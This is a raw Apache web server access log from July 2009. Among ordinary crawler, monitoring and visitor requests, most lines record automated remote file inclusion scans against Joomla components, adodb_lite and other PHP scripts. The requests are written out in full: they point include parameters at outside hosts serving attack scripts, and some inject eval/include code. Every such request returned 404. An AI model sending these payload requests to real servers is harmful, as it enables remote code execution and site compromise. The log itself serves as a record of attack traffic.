123.125.66.41 - - [28/Jul/2009:01:17:46 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
218.38.18.31 - - [28/Jul/2009:01:18:41 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://eu-save.biz/idxx.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
218.38.18.31 - - [28/Jul/2009:01:18:42 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://eu-save.biz/idxx.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
218.38.18.31 - - [28/Jul/2009:01:18:42 -0400] "GET /logs/access_log.Q109070700//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://eu-save.biz/idxx.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
220.181.7.97 - - [28/Jul/2009:01:19:44 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
218.38.18.31 - - [28/Jul/2009:01:19:45 -0400] "GET /logs/access_log.Q109062300//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://eu-save.biz/idxx.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jul/2009:01:20:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
117.110.74.195 - - [28/Jul/2009:01:20:54 -0400] "GET ///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:01:20:54 -0400] "GET /logs/error_log.Q109061900%20%20///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:01:20:55 -0400] "GET /logs///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:01:20:59 -0400] "GET /logs/access_log.Q109051600%20%20///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:01:21:03 -0400] "GET /logs/access_log.Q109061900%20%20///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:01:21:08 -0400] "GET /logs/access_log.Q109060100%20%20///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:01:21:08 -0400] "GET /logs/error_log.Q109060100%20%20///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
89.234.7.92 - - [28/Jul/2009:01:21:15 -0400] "GET /logs/access_log.Q109051000//modules/vwar/admin/admin.php?vwar_root=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
89.234.7.92 - - [28/Jul/2009:01:21:17 -0400] "GET /logs/access_log.Q109051000//modules/vwar/admin/admin.php?vwar_root=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
89.234.7.92 - - [28/Jul/2009:01:21:23 -0400] "GET /logs/access_log.Q109051000//modules/vwar/admin/admin.php?vwar_root=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:01:21:28 -0400] "GET /logs/access_log.Q109070400%20%20///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:01:21:41 -0400] "GET /logs/error_log.Q109051600%20%20///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:01:21:55 -0400] "GET /logs/error_log.Q109070400%20%20///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:01:21:55 -0400] "GET /logs/access_log.Q109060300//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:01:21:55 -0400] "GET /logs/access_log.Q109051100//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:01:24:20 -0400] "GET /ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:01:24:20 -0400] "GET /logs/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:01:24:20 -0400] "GET /logs/access_log.Q109052900%20%20/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:01:24:20 -0400] "GET /logs/access_log.Q109070300%20%20/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jul/2009:01:25:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
94.23.205.32 - - [28/Jul/2009:01:25:12 -0400] "GET /logs/access_log.Q109052600%20/index.php?_REQUEST=&_REQUEST[option]=option,com_registration&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.energy-serv.ro/mambots/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
94.23.205.32 - - [28/Jul/2009:01:25:12 -0400] "GET /logs/error_log.Q109053000%20/index.php?_REQUEST=&_REQUEST[option]=option,com_registration&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.energy-serv.ro/mambots/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
115.88.240.91 - - [28/Jul/2009:01:25:17 -0400] "GET /logs/access_log.Q109052900%20%20/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
115.88.240.91 - - [28/Jul/2009:01:25:17 -0400] "GET /ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
115.88.240.91 - - [28/Jul/2009:01:25:17 -0400] "GET /logs/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
115.88.240.91 - - [28/Jul/2009:01:25:17 -0400] "GET /logs/access_log.Q109070300%20%20/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:01:26:18 -0400] "GET /logs/error_log.Q109061900///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:01:26:18 -0400] "GET /logs/access_log.Q109051600///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
75.10.112.56 - - [28/Jul/2009:01:26:39 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; FBSMTWB; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; MySpace;; MySpace;)"
75.10.112.56 - - [28/Jul/2009:01:26:39 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; FBSMTWB; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; MySpace;; MySpace;)"
75.10.112.56 - - [28/Jul/2009:01:26:41 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; FBSMTWB; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; MySpace;; MySpace;)"
75.10.112.56 - - [28/Jul/2009:01:26:41 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; FBSMTWB; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; MySpace;; MySpace;)"
94.23.205.32 - - [28/Jul/2009:01:26:43 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_fabrik&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.energy-serv.ro/mambots/id.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
94.23.205.32 - - [28/Jul/2009:01:26:43 -0400] "GET /logs/access_log.Q109070700/index.php?_REQUEST=&_REQUEST[option]=option,com_fabrik&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.energy-serv.ro/mambots/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
94.23.205.32 - - [28/Jul/2009:01:26:44 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=option,com_fabrik&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.energy-serv.ro/mambots/id.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
94.23.205.32 - - [28/Jul/2009:01:26:44 -0400] "GET /logs/access_log.Q109071900/index.php?_REQUEST=&_REQUEST[option]=option,com_fabrik&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.energy-serv.ro/mambots/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
74.50.85.19 - - [28/Jul/2009:01:27:08 -0400] "GET /logs/access_log.Q109051400//modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.i-ga.biz/readme.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
202.125.45.45 - - [28/Jul/2009:01:28:22 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=option,com_events&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
202.125.45.45 - - [28/Jul/2009:01:28:22 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_events&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
202.125.45.45 - - [28/Jul/2009:01:28:22 -0400] "GET /logs/access_log.Q109052700/index.php?_REQUEST=&_REQUEST[option]=option,com_events&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
218.38.18.31 - - [28/Jul/2009:01:28:28 -0400] "GET /logs/access_log.Q109070700%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://eu-save.biz/idxx.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
87.106.210.178 - - [28/Jul/2009:01:28:47 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
87.106.210.178 - - [28/Jul/2009:01:28:47 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
87.106.210.178 - - [28/Jul/2009:01:28:47 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
89.234.7.92 - - [28/Jul/2009:01:29:28 -0400] "GET /logs/access_log.Q109052900/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
89.234.7.92 - - [28/Jul/2009:01:29:28 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
89.234.7.92 - - [28/Jul/2009:01:29:28 -0400] "GET /logs/access_log.Q109070300/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
89.234.7.92 - - [28/Jul/2009:01:29:29 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
218.38.18.31 - - [28/Jul/2009:01:29:46 -0400] "GET /logs/access_log.Q109062300%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://eu-save.biz/idxx.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jul/2009:01:30:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
202.125.45.45 - - [28/Jul/2009:01:30:30 -0400] "GET /logs/access_log.Q109052700%20/index.php?_REQUEST=&_REQUEST[option]=option,com_events&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
201.232.54.48 - - [28/Jul/2009:01:30:41 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://dwno.or.kr/bbs/data/swat/v6.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
201.232.54.48 - - [28/Jul/2009:01:30:41 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://dwno.or.kr/bbs/data/swat/v6.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
201.232.54.48 - - [28/Jul/2009:01:30:45 -0400] "GET //include/admin.lib.inc.php?site_path=http://dwno.or.kr/bbs/data/swat/v6.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
201.232.54.48 - - [28/Jul/2009:01:30:50 -0400] "GET /logs/access_log.Q109070800//include/admin.lib.inc.php?site_path=http://dwno.or.kr/bbs/data/swat/v6.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
65.23.158.226 - - [28/Jul/2009:01:30:52 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
65.23.158.226 - - [28/Jul/2009:01:30:52 -0400] "GET /logs/access_log.Q109070300%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
65.23.158.226 - - [28/Jul/2009:01:30:52 -0400] "GET /logs/access_log.Q109052900%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
65.23.158.226 - - [28/Jul/2009:01:30:52 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
66.249.71.204 - - [28/Jul/2009:01:32:34 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L003C38381221C100C750081+WSEQ(S0060):1+OUITEM(A0200):01107101 HTTP/1.1" 200 27013 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [28/Jul/2009:01:35:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
115.88.240.91 - - [28/Jul/2009:01:36:24 -0400] "GET /logs/access_log.Q109052900/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
115.88.240.91 - - [28/Jul/2009:01:36:24 -0400] "GET /logs/access_log.Q109070300/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
195.209.236.77 - - [28/Jul/2009:01:37:13 -0400] "GET /logs//bbs/skin/zero_vote/ask_password.php?dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
195.209.236.77 - - [28/Jul/2009:01:37:13 -0400] "GET //bbs/skin/zero_vote/ask_password.php?dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
195.209.236.77 - - [28/Jul/2009:01:37:13 -0400] "GET /logs/access_log.Q109052100//bbs/skin/zero_vote/ask_password.php?dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
195.209.236.77 - - [28/Jul/2009:01:37:16 -0400] "GET /logs/access_log.Q109052100//bbs/skin/zero_vote/ask_password.php?dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
195.209.236.77 - - [28/Jul/2009:01:37:16 -0400] "GET //bbs/skin/zero_vote/ask_password.php?dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
195.209.236.77 - - [28/Jul/2009:01:37:16 -0400] "GET /logs//bbs/skin/zero_vote/ask_password.php?dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
195.209.236.77 - - [28/Jul/2009:01:37:25 -0400] "GET /logs/access_log.Q109060100//bbs/skin/zero_vote/ask_password.php?dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
195.209.236.77 - - [28/Jul/2009:01:37:27 -0400] "GET /logs/access_log.Q109060100//bbs/skin/zero_vote/ask_password.php?dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
195.209.236.77 - - [28/Jul/2009:01:37:56 -0400] "GET /logs//bbs/skin/zero_vote/ask_password.php?dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
195.209.236.77 - - [28/Jul/2009:01:37:56 -0400] "GET //bbs/skin/zero_vote/ask_password.php?dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
195.209.236.77 - - [28/Jul/2009:01:37:56 -0400] "GET /logs/access_log.Q109052100//bbs/skin/zero_vote/ask_password.php?dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
195.209.236.77 - - [28/Jul/2009:01:38:06 -0400] "GET /logs/access_log.Q109060100//bbs/skin/zero_vote/ask_password.php?dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
66.249.71.204 - - [28/Jul/2009:01:38:13 -0400] "GET /images/monthly_specials_July.jpg HTTP/1.1" 200 125946 "-" "Googlebot-Image/1.0"
202.125.45.45 - - [28/Jul/2009:01:38:37 -0400] "GET /logs/access_log.Q109051600/index.php?_REQUEST=&_REQUEST[option]=option,com_rsgallery&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
202.125.45.45 - - [28/Jul/2009:01:38:37 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_rsgallery&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
202.125.45.45 - - [28/Jul/2009:01:38:37 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=option,com_rsgallery&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
202.125.45.45 - - [28/Jul/2009:01:38:37 -0400] "GET /logs/access_log.Q109061900/index.php?_REQUEST=&_REQUEST[option]=option,com_rsgallery&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
195.209.236.77 - - [28/Jul/2009:01:38:42 -0400] "GET //bbs/skin/zero_vote/ask_password.php?dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
195.209.236.77 - - [28/Jul/2009:01:38:42 -0400] "GET /logs/access_log.Q109052100//bbs/skin/zero_vote/ask_password.php?dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
195.209.236.77 - - [28/Jul/2009:01:38:42 -0400] "GET /logs//bbs/skin/zero_vote/ask_password.php?dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
66.249.71.204 - - [28/Jul/2009:01:38:47 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
195.209.236.77 - - [28/Jul/2009:01:38:48 -0400] "GET /logs/access_log.Q109060100//bbs/skin/zero_vote/ask_password.php?dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
195.209.236.77 - - [28/Jul/2009:01:38:57 -0400] "GET /logs/access_log.Q109052100//bbs/skin/zero_vote/ask_password.php?dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
195.209.236.77 - - [28/Jul/2009:01:38:57 -0400] "GET //bbs/skin/zero_vote/ask_password.php?dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
195.209.236.77 - - [28/Jul/2009:01:38:57 -0400] "GET /logs//bbs/skin/zero_vote/ask_password.php?dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
195.209.236.77 - - [28/Jul/2009:01:39:03 -0400] "GET /logs/access_log.Q109060100//bbs/skin/zero_vote/ask_password.php?dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
209.59.12.99 - - [28/Jul/2009:01:40:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.38.18.31 - - [28/Jul/2009:01:40:32 -0400] "GET /logs/access_log.Q109051100//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
203.130.198.40 - - [28/Jul/2009:01:41:56 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
203.130.198.40 - - [28/Jul/2009:01:41:56 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
203.130.198.40 - - [28/Jul/2009:01:42:01 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
201.232.54.48 - - [28/Jul/2009:01:42:04 -0400] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
201.232.54.48 - - [28/Jul/2009:01:42:04 -0400] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
201.232.54.48 - - [28/Jul/2009:01:42:04 -0400] "GET /logs/access_log.Q109060400///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
74.6.22.169 - - [28/Jul/2009:01:42:20 -0400] "GET /images/_notes/nav_store_expr_blue.jpg.mno HTTP/1.0" 200 246 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
